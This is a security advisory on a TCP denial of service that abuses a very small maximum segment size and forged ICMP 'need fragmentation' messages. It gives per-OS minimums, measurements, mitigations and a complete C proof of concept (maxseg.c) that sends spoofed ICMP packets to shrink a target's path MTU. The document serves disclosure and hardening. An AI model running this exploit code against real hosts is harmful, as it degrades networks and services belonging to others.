COMMAND
TCP/IP
SYSTEMS AFFECTED
most systems
PROBLEM
Darren Reed found the following. On a LAN far far away, a rogue
packet was heading towards a server, ready to start up a new
storm ...
If any of you have tested what happens to the ability of a box to
perform well when it has a small MTU, you will know that setting
the MTU to (say) 56 on a diskless thing is a VERY VERY bad idea
when NFS read/write packets are generally 8k in size. Do not try
it on an NFS thing unless you plan to reboot it, OK? The last time
Darren did this was when he worked out you could fragment packets
inside the TCP header, and that lesson was enough for him.
Following on from this, it occurs to me that the problem with the
above can possibly be reproduced with TCP. How? That thing
called "maximum segment size". The problem? Well, the first is
that there does not appear to be a minimum. The second is that
it is negotiated by the caller, not the callee. Did we hear someone
say "oh dear"?
What does this mean? Well, if we connect to www.microsoft.com and
set our MSS to 143 (say), they need to send us 11 packets for
every one they would normally send us (with an MSS of 1436).
Total output for them is 1876 bytes instead of 1476 - a 27%
increase. However, that's not the real problem. Our experience is
that hosts, especially PCs, have a lot of trouble handling *LOTS*
of interrupts. To send 2k out via the network, it's no longer 2
packets but 20+ - a significant increase in the workload.
A quick table (based on 20-byte IP and TCP headers, so 40 bytes of
header per packet):
datalen   mss  packets  total bytes  % increase
   1436  1436        1         1476          0%
   1436  1024        2         1516          3%
   1436   768        2         1516          3%
   1436   512        3         1556          5%
   1436   256        6         1676         14%
   1436   128       12         1916         30%
   1436    64       23         2356         60%
   1436    32       45         3236        119%
   1436    28       52         3516        138%  (MTU = 68)
   1436    16       90         5036        241%
   1436     8      180         8636        485%
   1436     1     1436        58876       3889%
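The arithmetic behind the table can be sketched in a few lines of C. This is only an illustration under the same assumption as the table (a fixed 40 bytes of IP plus TCP header per packet, no options); the function names are made up for this sketch and `mss` is assumed to be at least 1.

```c
#include <stdio.h>

#define HDR_BYTES 40UL  /* 20-byte IP header + 20-byte TCP header, no options */

/* Packets needed to carry datalen bytes when each holds at most mss bytes. */
unsigned long segments_needed(unsigned long datalen, unsigned long mss)
{
    return (datalen + mss - 1) / mss;   /* ceiling division */
}

/* Bytes on the wire: the payload plus one 40-byte header per packet. */
unsigned long wire_bytes(unsigned long datalen, unsigned long mss)
{
    return datalen + segments_needed(datalen, mss) * HDR_BYTES;
}

/* Percentage increase over sending datalen in one packet, rounded. */
unsigned long pct_increase(unsigned long datalen, unsigned long mss)
{
    unsigned long base = datalen + HDR_BYTES;
    unsigned long extra = wire_bytes(datalen, mss) - base;

    return (extra * 100 + base / 2) / base;
}

/* Print one row in the same column order as the table. */
void print_overhead_row(unsigned long datalen, unsigned long mss)
{
    printf("%7lu %5lu %8lu %12lu %10lu%%\n", datalen, mss,
           segments_needed(datalen, mss), wire_bytes(datalen, mss),
           pct_increase(datalen, mss));
}
```

Calling print_overhead_row(1436, 128), for example, reports 12 packets, 1916 total bytes and a 30% increase.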
For Solaris, you can enforce a more sane minimum MSS than the
install default (1) with ndd:
ndd -set /dev/tcp tcp_mss_min 128
HP-UX 11.* is in the same basket as Solaris.
*BSD have varying minimums well above 1 - NetBSD at 32, FreeBSD
at 64. (OpenBSD's comment on this says 32 but the code says 64).
Linux 2.4 uses 88.
We can't see anything in the registry or MSDN which says what it
is for Windows. By experimentation, Win2000 appears to be 88 and
NT 4 appears to be 1.
Nothing else besides Solaris seems to have anything close to a
reasonable manner in which to tune the minimum value. What's most
surprising is that there does not appear to be a documented
minimum, just as there is no "minimum MTU" size for IP. If there
is, please correct us.
About the only bonus to this is that there does not appear to be
an easy way to affect the MSS sent in the initial SYN packet.
Oh, so how's this a potential denial of service attack? Generally
network efficiency comes through sending lots of large packets...
but don't tell ATM folks that, of course. Does it work? *shrug*
It is not easy to test... the only testing Darren could do (with
NetBSD) was to use the TCP_MAXSEG setsockopt, BUT this only affects
the sending MSS (now what use is that?). Still, in testing, changing
it from the default 1460 to 1 caused the number of packets to go
from 9 to 2260 to write 1436 bytes of data to discard. To send
100 * 1436 bytes from the NetBSD box to Solaris8 took 60 seconds
(MSS of 1) vs ~1 second with an MSS of 1460. Of even more
significance, one connection like this made almost no difference
after the first run, but running a second saw kernel CPU jump to
30% on an SS20/712 (we suspect there is some serious TCP tuning
happening dynamically). The sending host was likewise afflicted
with a significant CPU usage penalty if more than one was running.
There were some very surprising things happening too - with just
one session active, ~170-200pps were seen with netstat on Solaris,
but with the second, it was between 1750 and 1850pps. Can you
say "ACK storm"? Oh, and for fun you can enable TCP timestamping
just to make those headers bigger and run the system a bit harder
whilst processing packets!
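For anyone wanting to repeat the TCP_MAXSEG experiment, a minimal sketch of the two calls involved follows. The helper names set_send_mss and get_mss are made up for this example. How each stack treats the value is platform dependent: the text above found that NetBSD applied it to the sending side only, and some systems (Linux, for one, according to its tcp(7) manual page) apply their own bounds to whatever is requested.

```c
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>

/*
 * Ask the stack to use mss as the maximum segment size on fd.
 * Returns 0 on success, -1 on failure (errno is set by setsockopt).
 * Intended to be called after socket() and before connect().
 */
int set_send_mss(int fd, int mss)
{
    return setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, &mss, sizeof(mss));
}

/* Read back the MSS the stack currently reports for fd, or -1 on failure. */
int get_mss(int fd)
{
    int mss = 0;
    socklen_t len = sizeof(mss);

    if (getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, &mss, &len) == -1)
        return -1;
    return mss;
}
```

A stack that enforces a floor may reject a request such as set_send_mss(fd, 1) outright or quietly raise it, so reading the value back with get_mss after connecting is the only way to see what was really used.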
Darren did not investigate the impact of ICMP PMTU discovery, but
from his reading of at least the BSD source code, the MTU for the
route will be ignored if it is less than the default MSS when
sending out the TCP SYN with the MSS option. That aside, it will
still impact current connections and would appear to be a way to
force the _current_ MSS below that set at connect time. BSD will
not accept PMTU updates if the MTU is less than 296; on Solaris8
and Linux 2.4 it just needs to be above 68 (hmmm, that allows
you to get an effective MSS of less than 88).
/*
 * (C)Copyright 2001 Darren Reed.
 *
 * maxseg.c
 */
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#if BSD >= 199306
#include <sys/sysctl.h>
#endif
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_var.h>
#include <netinet/tcp.h>
#include <netinet/tcp_timer.h>
#include <netinet/tcp_var.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <fcntl.h>
#include <errno.h>
#include <err.h>

void prepare_icmp(struct sockaddr_in *);
void primedefaultmss(int, int);
u_short in_cksum(u_short *, int);
int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);

#define NEW_MSS 512
#define NEW_MTU 1500

/* MTU advertised in the next forged ICMP; halved after every send */
static int start_mtu = NEW_MTU;

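void primedefaultmss(fd, mss)
int fd, mss;
{
#ifdef __NetBSD__
    static int defaultmss = 0;
    int mib[4], msso, mssn;
    size_t olen;

    /* mss == 0 means "restore the default we saw on the first call" */
    if (mss == 0)
        mss = defaultmss;
    mssn = mss;
    olen = sizeof(msso);

    mib[0] = CTL_NET;
    mib[1] = AF_INET;
    mib[2] = IPPROTO_TCP;
    mib[3] = TCPCTL_MSSDFLT;
    /* read the current system-wide default MSS */
    if (sysctl(mib, 4, &msso, &olen, NULL, 0))
        err(1, "sysctl");
    if (defaultmss == 0)
        defaultmss = msso;
    /* install the new default, then read it back to confirm */
    if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
        err(1, "sysctl");
    if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
        err(1, "sysctl");
    printf("Default MSS: old %d new %d\n", msso, mssn);
#endif
#if HACKED_KERNEL
    /*
     * TCP_MAXSEG+1 is not a standard option; this path relies on a
     * locally patched kernel. It needs a real socket, so it is
     * skipped for the initial call made with fd == -1.
     */
    if (fd != -1) {
        int op;

        if (mss)
            op = mss;
        else
            op = 512;
        if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
            err(1, "setsockopt");
    }
#endif
}
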
int
main(int argc, char *argv[])
{
    struct sockaddr_in me, them;
    int fd, op, mss;
    socklen_t olen;
    ssize_t n;
    char prebuf[16374];
    time_t now1, now2;
    struct timeval tv;

    if (argc < 3) {
        fprintf(stderr, "usage: %s ipaddr port\n", argv[0]);
        return 1;
    }

    mss = NEW_MSS;
    primedefaultmss(-1, mss);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd == -1)
        err(1, "socket");

    memset((char *)&them, 0, sizeof(them));
    them.sin_family = AF_INET;
    them.sin_port = htons(atoi(argv[2]));
    them.sin_addr.s_addr = inet_addr(argv[1]);

    primedefaultmss(fd, mss);

    /* non-blocking, so connect() and read() never stall the loop below */
    op = fcntl(fd, F_GETFL, 0);
    if (op != -1) {
        op |= O_NONBLOCK;
        fcntl(fd, F_SETFL, op);
    }
    op = 1;
    /* TCP_NODELAY is an IPPROTO_TCP level option */
    (void) setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &op, sizeof(op));

    if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
        (errno != EINPROGRESS))
        err(1, "connect");

    olen = sizeof(op);
    if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
        printf("Remote mss %d\n", op);
    else
        err(1, "getsockopt");
#if HACKED_KERNEL
    olen = sizeof(op);
    if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
        printf("Our mss %d\n", op);
    else
        err(1, "getsockopt(+1)");
#endif

    /* our local address and port go into the forged ICMP payload */
    olen = sizeof(me);
    if (getsockname(fd, (struct sockaddr *)&me, &olen))
        err(1, "getsockname");

    (void) read(fd, prebuf, sizeof(prebuf));

    now1 = time(NULL);
    /* send two forged "need frag" ICMPs, draining the socket after each */
    for (op = 2; op; op--) {
        icmp_unreach(&me, &them);
        n = read(fd, prebuf, sizeof(prebuf));
        if (n == -1) {
            if (errno == ENOBUFS || errno == EAGAIN ||
                errno == EWOULDBLOCK) {
                /* nothing to read yet: sleep 10ms and carry on */
                tv.tv_sec = 0;
                tv.tv_usec = 10000;
                select(0, NULL, NULL, NULL, &tv);
                continue;
            }
            warn("read");
            break;
        }
    }
    now2 = time(NULL);
    printf("Elapsed time %ld\n", (long)(now2 - now1));

    /* put the default MSS back the way we found it */
    primedefaultmss(fd, 0);
    close(fd);
    return 0;
}

/*
 * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
 */
static char icmpbuf[256];
static int icmpsock = -1;
static struct sockaddr_in destsock;

void
prepare_icmp(dst)
struct sockaddr_in *dst;
{
    struct tcphdr *tcp;
    struct icmp *icmp;

    icmp = (struct icmp *)icmpbuf;

    /* one-time setup: raw socket plus the fields that never change */
    if (icmpsock == -1) {
        memset((char *)&destsock, 0, sizeof(destsock));
        destsock.sin_family = AF_INET;
        destsock.sin_addr = dst->sin_addr;

        srand(getpid());

        icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
        if (icmpsock == -1)
            err(1, "socket");

        /* the following messy stuff from Adam Glass (icmpsquish.c) */
        memset(icmp, 0, sizeof(struct icmp) + 8);
        icmp->icmp_type = ICMP_UNREACH;
        icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
        icmp->icmp_pmvoid = 0;

        icmp->icmp_ip.ip_v = IPVERSION;
        icmp->icmp_ip.ip_hl = 5;
        icmp->icmp_ip.ip_len = htons(NEW_MSS);
        icmp->icmp_ip.ip_p = IPPROTO_TCP;
        icmp->icmp_ip.ip_off = htons(IP_DF);
        icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
        icmp->icmp_ip.ip_id = rand() & 0xffff;

        icmp->icmp_ip.ip_src = dst->sin_addr;

        tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
        tcp->th_sport = dst->sin_port;
    }
    /* refreshed on every call: the MTU we claim the next hop has */
    icmp->icmp_nextmtu = htons(start_mtu);
    icmp->icmp_cksum = 0;
}

u_short
in_cksum(addr, len)
u_short *addr;
int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum),
     * we add sequential 16 bit words to it, and at the end, fold
     * back all the carry bits from the top 16 bits into the lower
     * 16 bits.
     */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }

    /*
     * add back carry outs from top 16 bits to low 16 bits
     */
    sum = (sum >> 16) + (sum & 0xffff);    /* add hi 16 to low 16 */
    sum += (sum >> 16);                    /* add carry */
    answer = ~sum;                         /* truncate to 16 bits */
    return (answer);
}

int icmp_unreach(src, dst)
struct sockaddr_in *src, *dst;
{
    struct tcphdr *tcp;
    struct icmp *icmp;
    u_short sum;
    int i;

    icmp = (struct icmp *)icmpbuf;

    /* fill in the fixed fields and the MTU to advertise this time */
    prepare_icmp(dst);

    /*
     * The embedded IP/TCP header describes a packet from the target
     * (dst) to us (src). Clear ip_sum first so that repeat calls do
     * not checksum over the previous checksum.
     */
    icmp->icmp_ip.ip_dst = src->sin_addr;
    icmp->icmp_ip.ip_sum = 0;
    sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
    icmp->icmp_ip.ip_sum = sum;

    tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
    tcp->th_dport = src->sin_port;

    sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
    icmp->icmp_cksum = sum;

    /* halve the advertised MTU for the next call, but never go below 69 */
    start_mtu /= 2;
    if (start_mtu < 69)
        start_mtu = 69;

    i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
               (struct sockaddr *)&destsock, sizeof(destsock));
    if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
        errno != EWOULDBLOCK)
        err(1, "sendto");
    return(0);
}

Some people do not understand the difference between the TCP
MSS and IP's MTU. Either that or both you and David LeBlanc are
grasping at straws in order to make WindowsNT look better.
MTU and Path MTU (PMTU) discovery are not the same as TCP's MSS
but they can and do impact it.
Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1
(it sent out lots of data packets that carried 1 byte of data) and
he got Win2000 to accept an MTU of 69 (effective MSS of 17 after
TCP options) through PMTU discovery. Now, if 20+68 is the reason
why 88 is the minimum MSS Win2000 will accept, then someone doesn't
understand what the word "MTU" means, because it refers to the
TOTAL IP datagram length, not the data part.
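To make the MTU versus MSS arithmetic concrete, here is a small sketch of how an effective MSS falls out of an MTU. It assumes 20-byte IP and TCP headers, and it assumes the "TCP options" mentioned above are 12 bytes (a timestamp option padded to a 4-byte boundary); mss_from_mtu is a name made up for this example.

```c
#define IP_HDR_LEN   20  /* IP header without options */
#define TCP_HDR_LEN  20  /* TCP header without options */
#define TCP_TS_OPT_LEN 12  /* assumed: 10-byte timestamp option plus padding */

/*
 * Data bytes left in one packet once the IP header, TCP header and any
 * TCP options have been taken out of the MTU. Never returns less than 0.
 */
int mss_from_mtu(int mtu, int tcp_opt_len)
{
    int mss = mtu - IP_HDR_LEN - TCP_HDR_LEN - tcp_opt_len;

    return mss > 0 ? mss : 0;
}
```

With these assumptions mss_from_mtu(69, TCP_TS_OPT_LEN) gives 17 and mss_from_mtu(68, 0) gives 28, while an ordinary Ethernet MTU of 1500 with no options gives 1460.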
Using the C program above, one is able to get Win2000 to create an
MTU-specific path to a local box where the MTU was 69. That's
well under any number over 500 (depending on how you choose to
see the value).
Path MTU discovery has absolutely no interaction with the TCP MSS
except that one would expect it to be used if a cached path
already existed to a host, with an MTU specific for it set, when
initiating or accepting a new TCP connection.
SOLUTION
Quite clearly the host operating system needs to set a much more
sane minimum MSS than 1. Given there is no minimum MTU for IP -
well, maybe "68" - it's hard to derive what it should be.
Anything below 40 should just be banned (that's the point at which
you're transmitting 50% data, 50% headers). Most of the defaults
above are chosen because they fit in well with their internal
network buffering (some use a default MSS of 512 rather than
536 for similar reasons). But above that, what do you choose? 80
(roughly 33/67), 120 for a 25/75 or something higher still? Whatever the choice and
however it is calculated, it is not enough to just enforce it
when the MSS option is received. It also needs to be enforced
when the MTU parameter is checked in ICMP "need frag" packets.
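As a rough sketch of what enforcing the floor in both places could look like, consider the two checks below. This is not taken from any particular kernel: the function names are hypothetical, the floor of 128 is simply the value used in the ndd example earlier, and headers are assumed to be 40 bytes with no options.

```c
#define MIN_MSS      128  /* hypothetical floor, borrowed from the ndd example */
#define IP_TCP_HDRS   40  /* 20-byte IP header + 20-byte TCP header */

/*
 * Check 1: applied to the MSS option received from the peer.
 * Anything below the floor is raised to the floor.
 */
int clamp_peer_mss(int offered)
{
    return offered < MIN_MSS ? MIN_MSS : offered;
}

/*
 * Check 2: applied to the next-hop MTU carried in an ICMP "need frag"
 * message. Returns 1 if the update may be used, 0 if it should be
 * ignored because it would push the effective MSS below the floor.
 */
int pmtu_update_acceptable(int next_hop_mtu)
{
    return next_hop_mtu - IP_TCP_HDRS >= MIN_MSS;
}
```

With these numbers an offered MSS of 1 is treated as 128, and a "need frag" message claiming an MTU of 69 is ignored, while one claiming 1500 is accepted. Whether to ignore a too-small MTU or clamp it is a policy choice this sketch does not try to settle.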